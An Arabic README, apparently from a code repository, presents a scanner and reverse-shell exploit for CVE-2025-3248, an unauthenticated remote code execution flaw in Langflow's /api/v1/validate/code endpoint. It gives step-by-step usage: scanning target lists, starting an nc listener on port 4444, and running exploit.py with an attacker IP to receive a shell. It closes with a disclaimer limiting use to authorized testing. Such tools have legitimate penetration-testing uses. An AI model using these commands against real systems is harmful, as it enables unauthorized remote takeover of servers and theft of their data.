
ماسح ضوئي واستغلال لـ CVE-2025-3248، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليها في Langflow AI. يتضمن فاحص ثغرات ومولّد حمولة صدفة عكسية لاختبارات أمنية مصرح بها.
يحتوي هذا المستودع على سكربتين بلغة بايثون:
LangflowCheck.py: ماسح ضوئي يتحقق من مثيلات Langflow AI المعرضة لثغرة CVE-2025-3248.exploit.py: استغلال shell عكسي يعمل ضد أهداف Langflow المعرضة للخطر.CVE-2025-3248 هي ثغرة حرجة في Langflow AI تسمح للمهاجمين غير المصادق عليهم بتنفيذ كود بايثون عشوائي عن بُعد عبر حمولة مُصمَّمة تُرسل إلى /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) ومنفذ الاستماع (lport).exploit.log.pip install -r requirements.txt
عنوان URL واحد
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

أهداف متعددة
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

أولاً، ابدأ مستمعًا
sudo nc -nvlp 4444

ثم شغّل الاستغلال:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

يجب أن تستلم shell إذا كان الهدف معرضًا للخطر.

هذا الاستغلال مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.